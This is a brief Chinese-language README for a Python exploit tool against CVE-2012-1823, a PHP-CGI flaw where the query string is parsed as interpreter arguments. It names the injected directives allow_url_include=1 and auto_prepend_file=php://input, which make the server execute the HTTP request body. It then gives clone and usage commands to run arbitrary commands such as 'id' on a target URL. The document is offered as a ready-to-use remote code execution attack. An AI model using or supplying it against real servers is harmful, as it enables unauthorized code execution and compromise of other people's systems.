一个基于 Python 的 CVE-2012-1823 漏洞利用工具。该漏洞允许攻击者在运行存在漏洞的 PHP-CGI 版本的服务器上,通过查询字符串注入命令行参数来执行任意代码。
当 PHP 以 CGI 模式运行时,存在此缺陷。HTTP 查询字符串被错误地解析为 PHP 二进制文件的命令行参数。通过传递 -d 参数,我们可以覆盖 PHP 配置指令。
本利用工具使用的关键指令:
allow_url_include=1:启用数据流包含。auto_prepend_file=php://input:强制 PHP 执行 HTTP 请求正文的内容。确保已安装 Python 3 和 requests 库。
pip install requests
git clone https://github.com/tryj/CVE-2012-1823---PHP-CGI---RCE.git
cd CVE-2012-1823---PHP-CGI---RCE
python exploit.py -u <目标URL> -c <命令>
python exploit.py -u http://127.0.0.1 -c "id"